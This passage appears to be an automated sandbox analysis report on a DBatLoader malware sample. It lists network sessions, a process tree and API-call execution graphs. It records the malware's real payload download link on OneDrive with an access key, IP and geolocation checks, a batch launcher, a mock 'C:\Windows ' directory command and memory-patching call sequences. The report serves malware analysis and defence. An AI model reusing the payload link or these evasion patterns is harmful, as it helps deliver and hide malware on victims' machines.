                                                                                                                                access-control-allow-origin: *
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                x-envoy-upstream-service-time: 3
                                                                                                                                via: 1.1 google
                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2024-02-08 14:21:18 UTC3INData Raw: 55 53 0a
                                                                                                                                Data Ascii: US


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.84970954.145.184.724437604C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:21 UTC102OUTGET / HTTP/1.1
                                                                                                                                Host: checkip.amazonaws.com
                                                                                                                                User-Agent: Go-http-client/1.1
                                                                                                                                Accept-Encoding: gzip
                                                                                                                                2024-02-08 14:21:21 UTC118INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 08 Feb 2024 14:21:21 GMT
                                                                                                                                Server: Not Available
                                                                                                                                Content-Length: 13
                                                                                                                                Connection: Close
                                                                                                                                2024-02-08 14:21:21 UTC13INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                                                Data Ascii: 81.181.57.74


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.84971313.107.137.114437860C:\Users\Public\Libraries\Finqiaev.PIF
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:25 UTC213OUTGET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Accept: */*
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                Host: onedrive.live.com
                                                                                                                                2024-02-08 14:21:25 UTC1176INHTTP/1.1 302 Found
                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                Pragma: no-cache
                                                                                                                                Content-Type: text/html
                                                                                                                                Expires: -1
                                                                                                                                Location: https://6vq0og.dm.files.1drv.com/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WdLIezYrkztAhu5AgUp-0-xEUG6-7WTrZnFLnzeiYT2527T6pZFAv88MhddwcZ6gzCTIGvjS-BaeugbnKh9ukierb5lXG5KrjN6GxldXSludZg9AWtO6BUkA8E-czkkdTbVbVUf_iTCc3WpFh1l_c6lL_Og/255_Finqiaevxgz?download&psid=1
                                                                                                                                Set-Cookie: E=P:YMGIO7Eo3Ig=:HygsmETjEqyRl7L7YCRhD+dXkTa+8FFQ3NiJq6SlZFM=:F; domain=.live.com; path=/
                                                                                                                                Set-Cookie: xid=a30bb6be-f46f-40ad-8d38-f9a62a98b35a&&ODSP-ODWEB-ODCF&72; domain=.live.com; path=/
                                                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Thu, 08-Feb-2024 12:41:25 GMT; path=/
                                                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Thu, 15-Feb-2024 14:21:25 GMT; path=/
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                X-MSNServer: 7b77f7cd64-t8zqx
                                                                                                                                X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                X-MSEdge-Ref: Ref A: 3CCDE56D34AE42A59E3FA43C193ADBD3 Ref B: BN3EDGE1112 Ref C: 2024-02-08T14:21:25Z
                                                                                                                                Date: Thu, 08 Feb 2024 14:21:25 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.84971613.107.137.114438020C:\Users\Public\Libraries\Finqiaev.PIF
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:34 UTC213OUTGET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Accept: */*
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                Host: onedrive.live.com
                                                                                                                                2024-02-08 14:21:35 UTC1176INHTTP/1.1 302 Found
                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                Pragma: no-cache
                                                                                                                                Content-Type: text/html
                                                                                                                                Expires: -1
                                                                                                                                Location: https://6vq0og.dm.files.1drv.com/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRf0haUWjedyE78ca-SlWmj-mvBDIQeKET0OMwogjAWjJa6djTkwRFcikYaT1o9VKBETdgNCXZJbJWYVjKIwXgBc0ixW0j_KAEJgkX6DrRH3ne63b_4JTapCrCD2RdYMF8MphQndOcvw4PLLzg09bBByBupg/255_Finqiaevxgz?download&psid=1
                                                                                                                                Set-Cookie: E=P:2lVCQbEo3Ig=:mnsm2qkC9xKV0tSFvR7jNsRP1HylCy7bwZVp5Y9OVQY=:F; domain=.live.com; path=/
                                                                                                                                Set-Cookie: xid=d617a496-14c3-4199-bd78-ff86eec86b6a&&ODSP-ODWEB-ODCF&72; domain=.live.com; path=/
                                                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Thu, 08-Feb-2024 12:41:34 GMT; path=/
                                                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Thu, 15-Feb-2024 14:21:35 GMT; path=/
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                X-MSNServer: 6cc6b9df7d-lfr9g
                                                                                                                                X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                X-MSEdge-Ref: Ref A: C699048C3CEF48E2B2FB2D624A2926BE Ref B: BN3EDGE0814 Ref C: 2024-02-08T14:21:34Z
                                                                                                                                Date: Thu, 08 Feb 2024 14:21:34 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.84971834.117.186.1924437952C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:38 UTC97OUTGET /country HTTP/1.1
                                                                                                                                Host: ipinfo.io
                                                                                                                                User-Agent: Go-http-client/1.1
                                                                                                                                Accept-Encoding: gzip
                                                                                                                                2024-02-08 14:21:38 UTC504INHTTP/1.1 200 OK
                                                                                                                                server: nginx/1.24.0
                                                                                                                                date: Thu, 08 Feb 2024 14:21:38 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                Content-Length: 3
                                                                                                                                access-control-allow-origin: *
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                x-envoy-upstream-service-time: 3
                                                                                                                                via: 1.1 google
                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2024-02-08 14:21:38 UTC3INData Raw: 55 53 0a
                                                                                                                                Data Ascii: US


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.84971954.145.184.724437952C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:39 UTC102OUTGET / HTTP/1.1
                                                                                                                                Host: checkip.amazonaws.com
                                                                                                                                User-Agent: Go-http-client/1.1
                                                                                                                                Accept-Encoding: gzip
                                                                                                                                2024-02-08 14:21:39 UTC118INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 08 Feb 2024 14:21:39 GMT
                                                                                                                                Server: Not Available
                                                                                                                                Content-Length: 13
                                                                                                                                Connection: Close
                                                                                                                                2024-02-08 14:21:39 UTC13INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                                                Data Ascii: 81.181.57.74


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.84972034.117.186.1924435264C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:44 UTC97OUTGET /country HTTP/1.1
                                                                                                                                Host: ipinfo.io
                                                                                                                                User-Agent: Go-http-client/1.1
                                                                                                                                Accept-Encoding: gzip
                                                                                                                                2024-02-08 14:21:44 UTC504INHTTP/1.1 200 OK
                                                                                                                                server: nginx/1.24.0
                                                                                                                                date: Thu, 08 Feb 2024 14:21:44 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                Content-Length: 3
                                                                                                                                access-control-allow-origin: *
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                x-envoy-upstream-service-time: 2
                                                                                                                                via: 1.1 google
                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2024-02-08 14:21:44 UTC3INData Raw: 55 53 0a
                                                                                                                                Data Ascii: US


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.84972154.145.184.724435264C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:46 UTC102OUTGET / HTTP/1.1
                                                                                                                                Host: checkip.amazonaws.com
                                                                                                                                User-Agent: Go-http-client/1.1
                                                                                                                                Accept-Encoding: gzip
                                                                                                                                2024-02-08 14:21:46 UTC118INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 08 Feb 2024 14:21:46 GMT
                                                                                                                                Server: Not Available
                                                                                                                                Content-Length: 13
                                                                                                                                Connection: Close
                                                                                                                                2024-02-08 14:21:46 UTC13INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                                                Data Ascii: 81.181.57.74


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:15:21:02
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:2'088'448 bytes
                                                                                                                                MD5 hash:42F93EF4AC4943F328A1518BDE3C333A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1362814847.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:15:21:15
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "
                                                                                                                                Imagebase:0xa40000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:15:21:15
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:15:21:15
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:cmd /c mkdir "\\?\C:\Windows "
                                                                                                                                Imagebase:0xa40000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:6
                                                                                                                                Start time:15:21:15
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:15:21:15
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:175'800 bytes
                                                                                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 4%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:15:21:23
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Users\Public\Libraries\Finqiaev.PIF
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\Public\Libraries\Finqiaev.PIF"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:2'088'448 bytes
                                                                                                                                MD5 hash:42F93EF4AC4943F328A1518BDE3C333A
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 71%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:15:21:29
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:175'800 bytes
                                                                                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:11
                                                                                                                                Start time:15:21:31
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Users\Public\Libraries\Finqiaev.PIF
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\Public\Libraries\Finqiaev.PIF"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:2'088'448 bytes
                                                                                                                                MD5 hash:42F93EF4AC4943F328A1518BDE3C333A
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:12
                                                                                                                                Start time:15:21:41
                                                                                                                                Start date:08/02/2024
                                                                                                                                Path:C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:175'800 bytes
                                                                                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:7.2%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:8.4%
                                                                                                                                  Total number of Nodes:634
                                                                                                                                  Total number of Limit Nodes:34
                                                                                                                                  execution_graph 55678 4248704 55681 423ca40 55678->55681 55682 423ca48 55681->55682 55682->55682 57934 41e2f9c QueryPerformanceCounter 55682->57934 55684 423ca6a 57937 41e2fc4 55684->57937 55686 423ca74 InetIsOffline 55687 423ca8f 55686->55687 55688 423ca7e 55686->55688 55690 41e47dc 11 API calls 55687->55690 57947 41e47dc 55688->57947 55692 423ca9e 55690->55692 57938 41e4b0c 55692->57938 57935 41e2fa9 57934->57935 57936 41e2fb4 GetTickCount 57934->57936 57935->55684 57936->55684 57937->55686 57939 41e4b1d 57938->57939 57940 41e4b5a 57939->57940 57941 41e4b43 57939->57941 57962 41e484c 57940->57962 57953 41e4ed4 57941->57953 57944 41e4b8b 57945 41e4b50 57945->57944 57946 41e47dc 11 API calls 57945->57946 57946->57944 57948 41e47e0 57947->57948 57951 41e47f0 57947->57951 57950 41e484c 11 API calls 57948->57950 57948->57951 57949 41e481e 57949->55692 57950->57951 57951->57949 57952 41e2cc8 11 API calls 57951->57952 57952->57949 57954 41e4ee1 57953->57954 57961 41e4f11 57953->57961 57956 41e4f0a 57954->57956 57957 41e4eed 57954->57957 57958 41e484c 11 API calls 57956->57958 57967 41e2ce0 11 API calls 57957->57967 57958->57961 57959 41e4efb 57959->57945 57968 41e4788 57961->57968 57963 41e4874 57962->57963 57964 41e4850 57962->57964 57963->57945 57981 41e2cac 57964->57981 57966 41e485d 57966->57945 57967->57959 57969 41e478e 57968->57969 57971 41e47a9 57968->57971 57969->57971 57972 41e2cc8 57969->57972 57971->57959 57973 41e2cd6 57972->57973 57974 41e2ccc 57972->57974 57973->57971 57974->57973 57975 41e2dd5 57974->57975 57979 41e686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57974->57979 57980 41e2da4 7 API calls 57975->57980 57978 41e2df6 57978->57971 57979->57975 57980->57978 57982 41e2cc3 57981->57982 57985 41e2cb0 57981->57985 57982->57966 57983 41e2cba 57983->57966 57984 41e2dd5 57990 41e2da4 7 API calls 57984->57990 57985->57983 57985->57984 57989 41e686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57985->57989 57988 41e2df6 57988->57966 57989->57984 57990->57988 57991 42426a7 57992 41e4b0c 11 API calls 57991->57992 57993 42426ac 57992->57993 57994 42426b7 57993->57994 57995 41e4b0c 11 API calls 57994->57995 57996 42426e4 57995->57996 57997 42426ef 57996->57997 58984 41e4a98 57997->58984 57999 424271b 58000 4242726 57999->58000 58001 4242733 58000->58001 58999 41ffd38 58001->58999 58004 41e4b0c 11 API calls 58005 4242760 58004->58005 58006 424276b 58005->58006 58007 41e4a98 11 API calls 58006->58007 58008 4242797 58007->58008 58009 42427a2 58008->58009 58010 41ffd38 19 API calls 58009->58010 58011 42427bb 58010->58011 58012 41e4b0c 11 API calls 58011->58012 58013 42427dc 58012->58013 58014 41e4a98 11 API calls 58013->58014 58015 4242813 58014->58015 58016 41ffd38 19 API calls 58015->58016 58017 4242837 58016->58017 58018 4242871 58017->58018 59011 423b684 58018->59011 58021 41e4b0c 11 API calls 58022 424289e 58021->58022 58023 42428a9 58022->58023 58024 41e4a98 11 API calls 58023->58024 58025 42428d5 58024->58025 58026 42428e0 58025->58026 58027 41ffd38 19 API calls 58026->58027 58028 42428f9 58027->58028 58029 41e4b0c 11 API calls 58028->58029 58030 424291f 58029->58030 58031 41e4b0c 11 API calls 58030->58031 58032 4242957 58031->58032 58033 41e4a98 11 API calls 58032->58033 58034 424298e 58033->58034 58035 41ffd38 19 API calls 58034->58035 58036 42429b2 58035->58036 59025 423b9d8 58036->59025 58039 41e47dc 11 API calls 58040 42429d7 58039->58040 58041 41e4b0c 11 API calls 58040->58041 58042 42429f8 58041->58042 58043 41e4a98 11 API calls 58042->58043 58044 4242a2f 58043->58044 58045 41ffd38 19 API calls 58044->58045 58046 4242a53 58045->58046 58047 41e4b0c 11 API calls 58046->58047 58048 4242a74 58047->58048 58049 4242a8c 58048->58049 58050 41e4a98 11 API calls 58049->58050 58051 4242aab 58050->58051 58052 4242ac3 58051->58052 58053 41ffd38 19 API calls 58052->58053 58054 4242acf 58053->58054 58055 41e4b0c 11 API calls 58054->58055 58056 4242af0 58055->58056 58057 4242afb 58056->58057 58058 41e4a98 11 API calls 58057->58058 58059 4242b27 58058->58059 58060 4242b32 58059->58060 58061 41ffd38 19 API calls 58060->58061 58062 4242b4b 58061->58062 58063 4242b5c 58062->58063 58064 423b684 18 API calls 58063->58064 58065 4242b91 58064->58065 58066 41e4b0c 11 API calls 58065->58066 58067 4242bb2 58066->58067 58068 41e4a98 11 API calls 58067->58068 58069 4242be9 58068->58069 58070 4242c01 58069->58070 58071 41ffd38 19 API calls 58070->58071 58072 4242c0d 58071->58072 58073 41e4b0c 11 API calls 58072->58073 58074 4242c2e 58073->58074 58075 4242c39 58074->58075 58076 4242c46 58075->58076 58077 41e4a98 11 API calls 58076->58077 58078 4242c65 58077->58078 58079 4242c70 58078->58079 58080 41ffd38 19 API calls 58079->58080 58081 4242c89 58080->58081 58082 41e4b0c 11 API calls 58081->58082 58083 4242d2b 58082->58083 58084 4242d36 58083->58084 58085 41e4b0c 11 API calls 58084->58085 58086 4242d63 58085->58086 58087 4242d6e 58086->58087 58088 4242d7b 58087->58088 58089 41e4a98 11 API calls 58088->58089 58090 4242d9a 58089->58090 58091 4242db2 58090->58091 58092 41ffd38 19 API calls 58091->58092 58093 4242dbe 58092->58093 58094 41e4b0c 11 API calls 58093->58094 58095 4242ddf 58094->58095 58096 4242dea 58095->58096 58097 4242df7 58096->58097 58098 41e4a98 11 API calls 58097->58098 58099 4242e16 58098->58099 58100 4242e2e 58099->58100 58101 41ffd38 19 API calls 58100->58101 58102 4242e3a 58101->58102 58103 41e4b0c 11 API calls 58102->58103 58104 4242e5b 58103->58104 58105 4242e66 58104->58105 58106 4242e73 58105->58106 58107 41e4a98 11 API calls 58106->58107 58108 4242e92 58107->58108 58109 4242eaa 58108->58109 58110 41ffd38 19 API calls 58109->58110 58111 4242eb6 58110->58111 59030 41e50e8 58111->59030 58985 41e4a9c 58984->58985 58986 41e4afd 58984->58986 58987 41e47dc 58985->58987 58988 41e4aa4 58985->58988 58989 41e47f0 58987->58989 58993 41e484c 11 API calls 58987->58993 58988->58986 58991 41e47dc 11 API calls 58988->58991 58994 41e4ab3 58988->58994 58990 41e481e 58989->58990 58995 41e2cc8 11 API calls 58989->58995 58990->57999 58991->58994 58992 41e484c 11 API calls 58996 41e4acd 58992->58996 58993->58989 58994->58992 58995->58990 58997 41e47dc 11 API calls 58996->58997 58998 41e4af9 58997->58998 58998->57999 59000 41ffd4c 58999->59000 59001 41ffd6f LoadLibraryExA 59000->59001 59032 41e4c4c 59001->59032 59004 41e4c4c 59005 41ffd90 GetProcAddress GetCurrentProcess NtProtectVirtualMemory 59004->59005 59034 41ffd2c 59005->59034 59007 41ffdd2 GetCurrentProcess NtWriteVirtualMemory FreeLibrary 59008 41ffe06 59007->59008 59035 41e47ac 59008->59035 59012 423b69a 59011->59012 59039 41e5228 59012->59039 59014 423b6a2 59015 423b6c2 RtlDosPathNameToNtPathName_U 59014->59015 59045 423b5d4 59015->59045 59017 423b6de NtCreateFile 59018 423b709 59017->59018 59046 41e4ca4 59018->59046 59023 41e4788 11 API calls 59024 423b755 59023->59024 59024->58021 59026 41e4ed4 11 API calls 59025->59026 59028 423b9f0 59026->59028 59027 423ba11 59027->58039 59028->59027 59029 41e4ca4 11 API calls 59028->59029 59029->59028 59031 41e50ee 59030->59031 59033 41e4c50 GetModuleHandleA 59032->59033 59033->59004 59034->59007 59037 41e47b2 59035->59037 59036 41e47d8 59036->58004 59037->59036 59038 41e2cc8 11 API calls 59037->59038 59038->59037 59040 41e522e SysAllocStringLen 59039->59040 59041 41e5244 59039->59041 59040->59041 59042 41e4f38 59040->59042 59041->59014 59043 41e4f54 59042->59043 59044 41e4f44 SysAllocStringLen 59042->59044 59043->59014 59044->59042 59044->59043 59045->59017 59047 41e4c58 59046->59047 59048 41e4c93 NtWriteFile NtClose 59047->59048 59049 41e484c 11 API calls 59047->59049 59052 41e4f68 59048->59052 59050 41e4c6f 59049->59050 59050->59048 59051 41e2cc8 11 API calls 59050->59051 59051->59048 59053 41e4f6e SysFreeString 59052->59053 59054 41e4f7c 59052->59054 59053->59054 59054->59023 59055 4249740 59065 41e68b8 59055->59065 59059 424976e 59070 4248710 timeSetEvent 59059->59070 59061 4249778 59062 4249786 GetMessageA 59061->59062 59063 4249796 59062->59063 59064 424977a TranslateMessage DispatchMessageA 59062->59064 59064->59062 59066 41e68c3 59065->59066 59071 41e4444 59066->59071 59069 41e4558 SysAllocStringLen SysFreeString SysReAllocStringLen 59069->59059 59070->59061 59072 41e448a 59071->59072 59073 41e4503 59072->59073 59074 41e4694 59072->59074 59085 41e43dc 59073->59085 59076 41e46c5 59074->59076 59080 41e46d6 59074->59080 59091 41e4608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 59076->59091 59079 41e46cf 59079->59080 59081 41e471b FreeLibrary 59080->59081 59082 41e473f 59080->59082 59081->59080 59083 41e474e ExitProcess 59082->59083 59084 41e4748 59082->59084 59084->59083 59086 41e441f 59085->59086 59087 41e43ec 59085->59087 59086->59069 59087->59086 59092 41e5b78 59087->59092 59096 42495f8 59087->59096 59110 41e1668 59087->59110 59091->59079 59093 41e5b88 GetModuleFileNameA 59092->59093 59095 41e5ba4 59092->59095 59114 41e5ddc GetModuleFileNameA RegOpenKeyExA 59093->59114 59095->59087 59097 4249670 59096->59097 59098 4249612 GetVersion 59096->59098 59097->59087 59133 4227420 GetCurrentProcessId 59098->59133 59102 4249636 59165 41f7200 44 API calls 59102->59165 59104 4249640 59166 41f71ac 44 API calls 59104->59166 59106 4249650 59167 41f71ac 44 API calls 59106->59167 59108 4249660 59168 41f71ac 44 API calls 59108->59168 59329 41e15fc 59110->59329 59112 41e1670 VirtualAlloc 59113 41e1687 59112->59113 59113->59087 59115 41e5e5f 59114->59115 59116 41e5e1f RegOpenKeyExA 59114->59116 59132 41e5c18 12 API calls 59115->59132 59116->59115 59117 41e5e3d RegOpenKeyExA 59116->59117 59117->59115 59119 41e5ee8 lstrcpynA GetThreadLocale GetLocaleInfoA 59117->59119 59123 41e5f1f 59119->59123 59124 41e6002 59119->59124 59120 41e5e84 RegQueryValueExA 59121 41e5ec2 RegCloseKey 59120->59121 59122 41e5ea4 RegQueryValueExA 59120->59122 59121->59095 59122->59121 59123->59124 59126 41e5f2f lstrlenA 59123->59126 59124->59095 59127 41e5f47 59126->59127 59127->59124 59128 41e5f6c lstrcpynA LoadLibraryExA 59127->59128 59129 41e5f94 59127->59129 59128->59129 59129->59124 59130 41e5f9e lstrcpynA LoadLibraryExA 59129->59130 59130->59124 59131 41e5fd0 lstrcpynA LoadLibraryExA 59130->59131 59131->59124 59132->59120 59169 41e96ec 59133->59169 59136 41e47dc 11 API calls 59137 4227469 59136->59137 59138 4227473 GlobalAddAtomA GetCurrentThreadId 59137->59138 59139 41e96ec 42 API calls 59138->59139 59140 42274ad 59139->59140 59141 